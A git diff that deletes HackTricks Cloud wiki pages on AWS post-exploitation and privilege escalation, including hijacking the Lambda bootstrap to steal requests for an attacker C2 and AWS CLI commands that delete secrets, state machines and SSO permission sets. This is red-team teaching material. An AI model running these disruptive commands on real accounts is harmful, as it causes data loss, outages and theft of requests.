- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Flow - -

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

- -1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - * **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - * **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - * **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** - -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. - -## Stealing Lambda Requests - -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. - -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: - -* **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. 
- * A request must be sent to **`/${invoke-id}/response`** - * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -* Execute a malicious **`boostrap.py`** which will handle the next invocations - * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. - * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. - -### Attack Steps - -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: - -```bash -python3 <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md deleted file mode 100644 index db17d6d72..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# AWS - Lightsail Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information, check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Restore old DB snapshots - -If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it. - -### Restore Instance Snapshots - -Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\ -Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance. - -### Access Sensitive Information - -Check out the Lightsail privesc options to learn different ways to access potential sensitive information: - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md deleted file mode 100644 index 9bd9c70bb..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Organizations Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Organizations - -For more info about AWS Organizations check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -### Leave the Org - -{% code overflow="wrap" %} -```bash -aws organizations deregister-account --account-id --region -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md deleted file mode 100644 index cc0591b88..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more information check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Read Secrets - -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. - -### DoS Change Secret Value - -Changing the value of the secret you could **DoS all the system that depends on that value.** - -{% hint style="warning" %} -Note that previous values are also stored, so it's easy to just go back to the previous value. -{% endhint %} - -```bash -# Requires permission secretsmanager:PutSecretValue -aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" -``` - -### DoS Change KMS key - -```bash -aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE -``` - -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - -```bash -aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md deleted file mode 100644 index 6e41ef586..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ /dev/null @@ -1,117 +0,0 @@ -# AWS - SES Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SES - -For more information check: - -{% content-ref url="../aws-services/aws-ses-enum.md" %} -[aws-ses-enum.md](../aws-services/aws-ses-enum.md) -{% endcontent-ref %} - -### `ses:SendEmail` - -Send an email. - -{% code overflow="wrap" %} -```bash -aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json -aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json -``` -{% endcode %} - -Still to test. - -### `ses:SendRawEmail` - -Send an email. - -```bash -aws ses send-raw-email --raw-message file://message.json -``` - -Still to test. - -### `ses:SendTemplatedEmail` - -Send an email based on a template. - -{% code overflow="wrap" %} -```bash -aws ses send-templated-email --source --destination --template -``` -{% endcode %} - -Still to test. - -### `ses:SendBulkTemplatedEmail` - -Send an email to multiple destinations - -```bash -aws ses send-bulk-templated-email --source --template -``` - -Still to test. - -### `ses:SendBulkEmail` - -Send an email to multiple destinations. - -``` -aws sesv2 send-bulk-email --default-content --bulk-email-entries -``` - -### `ses:SendBounce` - -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - -{% code overflow="wrap" %} -```bash -aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list -``` -{% endcode %} - -Still to test. - -### `ses:SendCustomVerificationEmail` - -This will send a customized verification email. You might need permissions also to created the template email. - -{% code overflow="wrap" %} -```bash -aws ses send-custom-verification-email --email-address --template-name -aws sesv2 send-custom-verification-email --email-address --template-name -``` -{% endcode %} - -Still to test. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md deleted file mode 100644 index ccffb5ede..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - SSO & identitystore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SSO & identitystore - -For more information check: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` - -These permissions can be used to disrupt permissions: - -{% code overflow="wrap" %} -```bash -aws sso-admin delete-permission-set --instance-arn --permission-set-arn - -aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn - -aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md deleted file mode 100644 index 67719fd73..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ /dev/null @@ -1,105 +0,0 @@ -# AWS - Step Functions Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information about this AWS service, check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### `states:RevealSecrets` - -This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. - -
- -### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` - -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. - -{% hint style="info" %} -* Deleting a state machine you also delete all its associated versions and aliases. -* Deleting a state machine alias you do not delete the state machine versions referecing this alias. -* It is not possible to delete a state machine version currently referenced by one o more aliases. -{% endhint %} - -```bash -# Delete state machine -aws stepfunctions delete-state-machine --state-machine-arn -# Delete state machine version -aws stepfunctions delete-state-machine-version --state-machine-version-arn -# Delete state machine alias -aws stepfunctions delete-state-machine-alias --state-machine-alias-arn -``` - -* **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. - -### `states:UpdateMapRun` - -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. 
- -{% code overflow="wrap" %} -```bash -aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] -``` -{% endcode %} - -* **Potential Impact**: Performance degradation, and disruption of critical workflows. - -### `states:StopExecution` - -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. - -{% hint style="warning" %} -This action is not supported by **express state machines**. -{% endhint %} - -{% code overflow="wrap" %} -```bash -aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] -``` -{% endcode %} - -* **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. - -### `states:TagResource`, `states:UntagResource` - -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws stepfunctions tag-resource --resource-arn --tags Key=,Value= -aws stepfunctions untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md deleted file mode 100644 index 4ca191307..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - VPN Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VPN - -For more information: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md deleted file mode 100644 index 5d96ec8ca..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Privilege Escalation - -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. - -{% hint style="warning" %} -AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. -{% endhint %} - -{% hint style="danger" %} -If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -So remember that this is another way to **grant privileged permissions** to a principal. -{% endhint %} - -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** - -## Tools - -* [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws\_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md deleted file mode 100644 index 7294ee888..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md +++ /dev/null @@ -1,35 +0,0 @@ -# AWS - Chime Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### chime:CreateApiKey - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
